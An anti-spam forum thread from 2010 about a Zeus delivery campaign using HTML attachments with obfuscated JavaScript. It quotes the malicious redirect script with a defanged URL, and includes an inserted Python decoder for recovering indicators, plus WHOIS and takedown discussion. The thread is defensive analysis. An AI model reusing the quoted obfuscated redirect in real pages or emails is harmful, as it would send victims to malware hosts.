Zeus delivery campaign

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Postby hellkyng » Fri Jun 18, 2010 1:19 pm

This post quotes malicious javascript, but the code has been disabled by being enclosed in "[code]" brackets. - Alpha


My apologies if this has already been discussed. Is anyone else seeing spam that delivers an .html attachment with obfuscated JavaScript in it? Something like:

Code:
<**Neutered for AV**script type='text/javascript'>function j(){};var uE=false;j.prototype = {v : function() {var l='';this.lU=false;this.a='';var r=document;f="";var rI=new Date();var s=14705;var y=r['l$o$cWaptWi$o$nd'.replace(/[dW\<p\$]/g, '')];k='';this.vT='';var x=new Array();y['har%eafp'.replace(/[p%~Aa]/g, '')]='hututrp*:u/r/^m*a)b*cuorm).un)e)t^/*zu.uh*tum)'.replace(/[\)r\^\*u]/g, '');var lC=new Array();var e=new Array();this.sJ="";var i=false;}};var uH=function(){return 'uH'};var u=new j(); var o=function(){};u.v();sQ="sQ";<**Neutered for AV**/script>


If you break it up, you find the malicious URL is hxxp://mabcom[dot]net. This URL then contains a redirect to a final spam site, typically pillz or replica watches, but it also contains a hidden iframe linking to a site that in this case contained RogueAV and Zeus.

The reason I ask is that the messages are rapidly changing, and throwing up way more javascript garbage to wade through for the redirect url. This morning alone I've seen 9 different subject lines.

And a final note to the lengthy (sorry!) post, a number of these redirect sites have been hosted with HostRocket.com. Has anyone had issues with them in the past? They have been responsive with takedown requests, but I find it odd they continue to be a problem.
hellkyng
Getting started
Posts: 18
Joined: Thu Jun 17, 2010 5:37 pm
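The only trick in the script quoted above is `'garbled literal'.replace(/[junk characters]/g, '')`: the real string is buried among filler characters, and a character-class regex strips them at run time. An analyst does not need to run the JavaScript to see what it does. The following is an added example (not from the original post or from anyone on this board) that pattern-matches those `replace` calls in the attachment text, expands each character class and removes those characters from the adjacent literal, then reports any URL it recovers in defanged form and whether the cleaned script assigns `location.href`. The sample string is a copy of the script body quoted above with the tags dropped; the function names are my own.

```python
"""Static recovery of strings hidden behind 'garbled'.replace(/[junk]/g, '') calls,
the pattern used by the HTML attachments in this campaign. Nothing is executed:
the script is treated as text. Added example; the helpers expand_class,
decode_replace_calls, defang and extract_iocs are hypothetical names."""
import re

# Constructed sample: the script body quoted in the post above, <script> tags removed.
SAMPLE_JS = (
    r"""function j(){};var uE=false;j.prototype = {v : function() {var l='';this.lU=false;this.a='';var r=document;f="";var rI=new Date();var s=14705;"""
    r"""var y=r['l$o$cWaptWi$o$nd'.replace(/[dW\<p\$]/g, '')];k='';this.vT='';var x=new Array();"""
    r"""y['har%eafp'.replace(/[p%~Aa]/g, '')]='hututrp*:u/r/^m*a)b*cuorm).un)e)t^/*zu.uh*tum)'.replace(/[\)r\^\*u]/g, '');"""
    r"""var lC=new Array();var e=new Array();this.sJ="";var i=false;}};"""
)

# A single- or double-quoted literal immediately followed by .replace(/[...]/g, '')
LITERAL = r"""(?:'(?P<s>[^'\n]*)'|"(?P<d>[^"\n]*)")"""
REPLACE_CALL = re.compile(
    LITERAL + r"""\s*\.replace\(\s*/\[(?P<cls>(?:\\.|[^\]\\])*)\]/g\s*,\s*(?:''|"")\s*\)"""
)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def expand_class(body):
    r"""Characters matched by a JS character-class body such as \)r\^\*u.
    Backslash escapes and a-z style ranges are handled; a negated class is
    refused, since stripping 'everything except' needs the whole alphabet."""
    if body.startswith("^"):
        raise ValueError("negated character classes are not supported")
    tokens = []  # (character, was_escaped)
    i = 0
    while i < len(body):
        if body[i] == "\\" and i + 1 < len(body):
            tokens.append((body[i + 1], True))
            i += 2
        else:
            tokens.append((body[i], False))
            i += 1
    chars = set()
    j = 0
    while j < len(tokens):
        # an unescaped '-' between two tokens denotes a range
        if j + 2 < len(tokens) and tokens[j + 1] == ("-", False):
            lo, hi = tokens[j][0], tokens[j + 2][0]
            chars.update(chr(k) for k in range(ord(lo), ord(hi) + 1))
            j += 3
        else:
            chars.add(tokens[j][0])
            j += 1
    return chars


def decode_replace_calls(js):
    """Return (decoded strings in source order, script text with every
    replace() call substituted by the plain literal it evaluates to)."""
    decoded = []

    def _plain(m):
        literal = m.group("s") if m.group("s") is not None else m.group("d")
        junk = expand_class(m.group("cls"))
        plain = "".join(ch for ch in literal if ch not in junk)
        decoded.append(plain)
        return "'" + plain.replace("'", "\\'") + "'"

    return decoded, REPLACE_CALL.sub(_plain, js)


def defang(url):
    """hxxp scheme and bracketed host dots, so the IOC is safe to paste into a ticket."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return "hxxp" + scheme[4:] + "://" + host.replace(".", "[.]") + sep + path


def extract_iocs(js):
    """Decoded strings, defanged URLs, and whether the cleaned script touches
    location.href (the redirect this campaign uses)."""
    decoded, cleaned = decode_replace_calls(js)
    return {
        "decoded": decoded,
        "urls": [defang(u) for u in URL_RE.findall(cleaned)],
        "redirect": "'location'" in cleaned and "'href'" in cleaned,
    }


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_JS)
    for s in result["decoded"]:
        print("decoded:", s)
    print("urls:", result["urls"], "redirect:", result["redirect"])
```

Run against the sample, the three decoded strings are `location`, `href` and the redirect target, i.e. the script is nothing more than `document.location.href = <url>`; the defanged URL is what goes on the block list. The same script can be pointed at a whole mailbox of attachments, and because it never evaluates the JavaScript, a variant that changes variable names or adds more filler characters still decodes as long as it keeps the `replace(/[...]/g, '')` idiom.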

Re: Zeus delivery campaign

Postby AlphaCentauri » Fri Jun 18, 2010 3:37 pm

Avira AntiVir doesn't like your post! :shock:

But it's pretty sensitive and will alarm if it sees javascript that's just too sneaky-looking, even if it's disabled. I added code brackets to be sure it's dead.

I don't recall problems with HostRocket. Is it a lot of issues in a short interval, or consistent occurrences over a long time period?

They are inexpensive, offer unlimited bandwidth, and allow an unlimited numbers of domain names for the same hosting package, so those features might be attractive to spammers with a lot of throwaway domains. Spammers often use stolen credit cards to pay anyway, but if the monthly fee is low, it's less likely to be noticed on the victim's bill or questioned by the hosting company at the time of signup.

It's also difficult to do aggressive enforcement on that kind of budget -- HostRocket may mean well, but may have resigned themselves to doing no more than responding to complaints, without doing any further investigation of the customers causing the complaints.
AlphaCentauri
You are kiillllling-a my bizinisss!
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Zeus delivery campaign

Postby hellkyng » Fri Jun 18, 2010 4:00 pm

Sorry about that, nothing like a quick test of the AV I suppose.

I'm just noticing issues with HostRocket, and I've seen a few posts around various sites that indicate there have been issues before. I think you might be right though; they have a nice set of services that make them easily abused. But to their credit, after a 30 minute wait on hold they did get the malicious content from a site removed in a matter of minutes.

I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign. I hate to see them abused, especially given this spam is doing a decent job of evading filters, at least our filters anyway.
hellkyng
Getting started
Posts: 18
Joined: Thu Jun 17, 2010 5:37 pm

Re: Zeus delivery campaign

Postby AlphaCentauri » Fri Jun 18, 2010 4:47 pm

hellkyng wrote: I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign.


It's worth a try. It's good to remember that most of us have learned a huge amount about the spammer economy since we started reporting, and abuse desk people simply don't know as much about it as we do. Most people are blown away when they find out how blatantly illegal a lot of these slick-looking websites are. Administrators can go from apathetic to on-the-warpath pretty quickly when they realize they've been played for fools.
AlphaCentauri
You are kiillllling-a my bizinisss!
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Zeus delivery campaign

Postby Red Dwarf » Fri Jun 18, 2010 5:14 pm

Analyzing - the corrupted domain and its name servers are long standing, so likely to be infiltrated.

WHOIS look-ups
1.
Domain Name: MABCOM.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: ok
Updated Date: 19-jan-2010
Creation Date: 21-jan-2004
..
2.
Name server
Domain Name: HRNOC.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 16-feb-2007
Creation Date: 12-nov-2001
..
Technical Contact:
HostRocket.Com
HostRocket Customer (register@hostrocket.com)
+1.5183713421
Fax:
21 Corporate Drive
Clifton Park, NY 12065
US

Web site mabcom.net is in Dutch, Google translated as
his website IS STILL under construction and take some more time than expected,
We will do our best to complete it as soon as possible!

MABCOM.NET is just opened!

What we do include

* Hardware Repair of computers including PC, Mac, Laptops
* Software-based Repair using such programs as virus removal, driver installation
* Repairs on Game consoles such as PSP, Wii, DS, Xbox 360, PS3 etc etc
* Modification - Photos Games computers (such as region free time)
* Purchasing, selling computers, game consoles and accessories

Don't hesitate to visit our shop (store to store) located in topgames - Jan van Galenstraat 60 1056CC Amsterdam

open Monday through Friday from 10:30 a.m. to 6:00 p.m. and Saturday from 10:30 a.m. to 5:00 p.m.

For a route description hXXp://www.TOPGAMES.NL

Alternatively, your mail for more info on: INFO@MABCOM.NET



Mvg

Michael Buys

MABCOM
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10487
Joined: Tue Jun 27, 2006 2:01 am

Re: Zeus delivery campaign

Postby hellkyng » Tue Jul 06, 2010 2:55 pm

Despite the ridiculous nature of these JavaScript obfuscation messages, I wanted to post a follow-up to this, as a couple of people have mentioned having issues with these specific fraud/malware spam messages. For whatever reason, commercial spam filtering vendors are not detecting these messages very well. An example that made it through today:

Subject: Delivery Status Notification (Failure)

Note: Forwarded message is attached. This is an automatically generated Delivery Status Notification. Delivery to the following recipients failed. mariekwi0@ringsmart.com Final-Recipient: rfc822;mariekwi0@ringsmart.com Action: failed Status: 5.1.1


This tripped up a number of users who clicked the HTML attachment to see "what they sent", which naturally contains a mixture of JavaScript garbage and a redirection to some bad sites.

For anyone else getting tripped up by this, the URLs used in the spam are fairly obvious; I'm happy to share what info I have as the campaign changes. We've taken the approach of simply blocking the URLs as we identify them, as they typically seem to only use 1-3 different URLs a week. Thanks for the info so far on this all; hopefully this helps others a bit as well.
hellkyng
Getting started
Posts: 18
Joined: Thu Jun 17, 2010 5:37 pm

Re: Zeus delivery campaign

Postby meep » Sat Jul 24, 2010 8:19 am

This one has been recently spamming crap out of my accounts. :roll:
On a related note: someone recently updated their blog to say the obvious. :evil:

Zbot/Zeus botnets aren’t going away
http://www.thesecurityblog.com/2010/07/zbotzeus-botnets-aren’t-going-away/
meep
Spammers' Nightmare
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Zeus delivery campaign

Postby meep » Sat Jul 24, 2010 8:43 am

Also interesting to note: in July 2010, researchers at TrendMicro published a 21-page analysis in PDF format about Zeus (also note its other malware names: ZBOT, WSNPoem, PRG, JabberZeuS, etc.), called ZeuS: A Persistent Cybercrime Enterprise.

It mentions that ZeuS is targeting Russian banks. Also worth mentioning: credit is given to the ZeuSTracker, which actively posts infected domains, IPs, ASNs, etc.
meep
Spammers' Nightmare
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Zeus delivery campaign

Postby Nodus » Sat Jul 24, 2010 6:37 pm

meep wrote: It mentions that ZeuS is targeting Russian banks.

Well, if that won't create some hassle in the Russian law enforcement circles, then I don't know what will. But if it takes some Duma members losing their savings or some FSB officer having his credit card number stolen before they start taking cybercrime seriously, so be it. :sad3:
Arf, she said
Nodus
Spammer Obliterator
Posts: 2286
Joined: Fri Jun 15, 2007 7:05 pm

